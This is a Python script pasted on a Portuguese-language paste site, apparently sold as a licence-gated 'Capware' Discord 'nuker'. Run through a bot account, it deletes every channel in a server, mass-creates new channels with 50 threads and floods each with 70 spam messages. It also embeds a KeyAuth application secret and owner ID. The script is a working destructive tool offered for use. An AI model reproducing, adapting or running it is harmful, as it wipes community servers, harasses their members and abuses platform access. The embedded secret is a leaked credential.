Cadastrar
Login
Novo texto
Página Inicial
Trending
Arquivo
Português
English
Português
Cadastrar
Login
Novo Texto
Importar Arquivo
import os import sys from keyauth import api import hashlib try: import discord from discord.ext import commands import threading import time import requests from discord.ext.commands import CommandNotFound import colorama from colorama import Fore import asyncio from datetime import datetime from pystyle import * import logging except: os.system('pip install discord colorama pystyle asyncio requests') import discord from discord.ext import commands import threading import time import requests from discord.ext.commands import CommandNotFound import colorama from colorama import Fore import asyncio from datetime import datetime from pystyle import * def getchecksum(): # to fetch checksum (FOR AUTHENTCIATION) md5_hash = hashlib.md5() # Get hash using md5 file = open(''.join(sys.argv), "rb") # rb, our saviour md5_hash.update(file.read()) digest = md5_hash.hexdigest() return digest keyauthapp = api( name = "keyauth capware nuker", ownerid = "oRA7ZOi6UP", secret = "00a1a2c85fd6b7446121bc9852e5f78ce2adcb2a60a98b3c87cc343d544838cd", version = "1.0", hash_to_check = getchecksum() ) def answer(): # code.? def g(): # goo goo gaa gaa f = 'key.txt' return open(f).read().strip() if os.path.exists(f) else None def s(k): with open('key.txt', 'w') as f: f.write(k) def a(): try: return input(f"{Fore.LIGHTBLACK_EX}<{Fore.LIGHTRED_EX}?{Fore.LIGHTBLACK_EX}> Licence Key? ") except KeyboardInterrupt: os._exit(1) e = g() # i, for myself do NOT know what the hell is this shit (i forgot) if e: print(f"{Fore.LIGHTBLACK_EX}<{Fore.LIGHTRED_EX}?{Fore.LIGHTBLACK_EX}> Logging in...") keyauthapp.license(e) else: n = a() keyauthapp.license(n) s(n) answer() def clear(): os.system("cls") os.system('title Capware Solutions [gg/capware]') logging.basicConfig(filename='debug.log', level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s') class CustomStreamHandler(logging.StreamHandler): def emit(self, record): try: formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s') self.setFormatter(formatter) msg = self.format(record) stream = self.stream stream.write(msg + '\n') self.flush() except (KeyboardInterrupt, SystemExit): raise except: self.handleError(record) logger = logging.getLogger('my_logger') stream_handler = CustomStreamHandler(sys.stdout) logger.addHandler(stream_handler) class StdoutToLogger: def __init__(self, logger, level=logging.INFO): self.logger = logger self.level = level def write(self, message): if message.rstrip() != "": level = "INFO" if "DEBUG" in message: level = "DEBUG" elif "WARNING" in message: level = "WARNING" elif "ERROR" in message: level = "ERROR" elif "CRITICAL" in message: level = "CRITICAL" fm = f"{Fore.LIGHTBLACK_EX}[{datetime.now().strftime('%H:%M:%S')}] @ {level} >>{Fore.LIGHTWHITE_EX} {message}" self.logger.log(getattr(logging, level), message.rstrip()) sys.__stdout__.write(fm + '\n') def flush(self): pass sys.stdout = StdoutToLogger(logging.getLogger('STDOUT'), logging.INFO) tkn = input(f"[{Fore.MAGENTA}Capware Solutions{Fore.RESET}] {Fore.LIGHTWHITE_EX}Enter bot token: ") msg = input(f"[{Fore.MAGENTA}Capware Solutions{Fore.RESET}] {Fore.LIGHTWHITE_EX}What would you like to spam? ") chn = input(f"[{Fore.MAGENTA}Capware Solutions{Fore.RESET}] {Fore.LIGHTWHITE_EX}Whats the channel name? ") headers = { "Authorization": f"Bot {tkn}" } session = requests.Session() client = commands.Bot(command_prefix="^", intents=discord.Intents.all()) client.remove_command("help") def asciiprint(): print(f"[{Fore.RED}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Ready. Use [^nice] to nuke.") @client.event async def on_ready() -> None: clear() t = threading.Thread(target=asciiprint) t.start() @client.event async def on_guild_channel_create(channel): for i in range(70): try: await channel.send(msg) print(f"[{Fore.MAGENTA}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Sent a message.") except: print(f"[{Fore.RED}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}An error occurred while sending a message.") async def wyvbasic1(ctx) -> None: guild = ctx.guild.id def spc(i): json_data = { "name": i } session.post( f"https://discord.com/api/v9/guilds/{guild}/channels", headers=headers, json=json_data ) print(f"[{Fore.MAGENTA}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Created channel.") for i in range(50): threading.Thread( target=spc, args=(chn,) ).start() @client.command() async def nice(ctx) -> None: await ctx.message.delete() guild = ctx.guild async def delete_channel(channel): try: await channel.delete() print(f"[{Fore.MAGENTA}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Deleted channel.") except discord.Forbidden: print("[{Fore.RED}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Missing permissions.") except discord.HTTPException as e: if e.code == 50074: print(f"[{Fore.RED}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Got error [50074]") else: print(f"[{Fore.RED}v{Fore.RESET}] {Fore.LIGHTWHITE_EX}Error {e}") ctd = [channel for channel in guild.channels if isinstance(channel, discord.TextChannel) or isinstance(channel, discord.VoiceChannel) or isinstance(channel, discord.CategoryChannel)] cs = 100 ch = [ctd[i:i + cs] for i in range(0, len(ctd), cs)] for chunk in ch: await asyncio.gather(*[delete_channel(channel) for channel in chunk]) await wyvbasic1(ctx) clear() print(f'[{Fore.MAGENTA}+{Fore.RESET}] {Fore.LIGHTWHITE_EX}Logging in...') try: client.run(tkn) except: print(f"[{Fore.RED}x{Fore.RESET}] {Fore.LIGHTWHITE_EX}Invalid token and/or rate limited.{Fore.RESET}") input()
Configurações do Texto
Título do Texto :
[Opcional]
Guardar na Pasta :
[Opcional]
Selecionar
Syntax Highlighting :
[Opcional]
Selecionar
Markup
CSS
JavaScript
Bash
C
C#
C++
Java
JSON
Lua
Plaintext
C-like
ABAP
ActionScript
Ada
Apache Configuration
APL
AppleScript
Arduino
ARFF
AsciiDoc
6502 Assembly
ASP.NET (C#)
AutoHotKey
AutoIt
Basic
Batch
Bison
Brainfuck
Bro
CoffeeScript
Clojure
Crystal
Content-Security-Policy
CSS Extras
D
Dart
Diff
Django/Jinja2
Docker
Eiffel
Elixir
Elm
ERB
Erlang
F#
Flow
Fortran
GEDCOM
Gherkin
Git
GLSL
GameMaker Language
Go
GraphQL
Groovy
Haml
Handlebars
Haskell
Haxe
HTTP
HTTP Public-Key-Pins
HTTP Strict-Transport-Security
IchigoJam
Icon
Inform 7
INI
IO
J
Jolie
Julia
Keyman
Kotlin
LaTeX
Less
Liquid
Lisp
LiveScript
LOLCODE
Makefile
Markdown
Markup templating
MATLAB
MEL
Mizar
Monkey
N4JS
NASM
nginx
Nim
Nix
NSIS
Objective-C
OCaml
OpenCL
Oz
PARI/GP
Parser
Pascal
Perl
PHP
PHP Extras
PL/SQL
PowerShell
Processing
Prolog
.properties
Protocol Buffers
Pug
Puppet
Pure
Python
Q (kdb+ database)
Qore
R
React JSX
React TSX
Ren'py
Reason
reST (reStructuredText)
Rip
Roboconf
Ruby
Rust
SAS
Sass (Sass)
Sass (Scss)
Scala
Scheme
Smalltalk
Smarty
SQL
Soy (Closure Template)
Stylus
Swift
TAP
Tcl
Textile
Template Toolkit 2
Twig
TypeScript
VB.Net
Velocity
Verilog
VHDL
vim
Visual Basic
WebAssembly
Wiki markup
Xeora
Xojo (REALbasic)
XQuery
YAML
HTML
Expiração do Texto :
[Opcional]
Nunca
Auto Destruir
10 Minutos
1 Hora
1 Dia
1 Semana
2 Semanas
1 Mês
6 Meses
1 Ano
Status do Texto :
[Opcional]
Público
Não Listado
Privado (somente membros)
Senha :
[Opcional]
Descrição:
[Opcional]
Tags:
[Opcional]
Criptografar Texto
(
?
)
Criar Novo Texto
No momento você não está logado, isso significa que você não pode editar ou excluir nada que você poste.
Cadastre-se
ou faça o
Login
Idiomas do site
×
English
Português
Você gosta de cookies?
🍪 Usamos cookies para garantir que você obtenha a melhor experiência em nosso site.
Saber mais
Concordo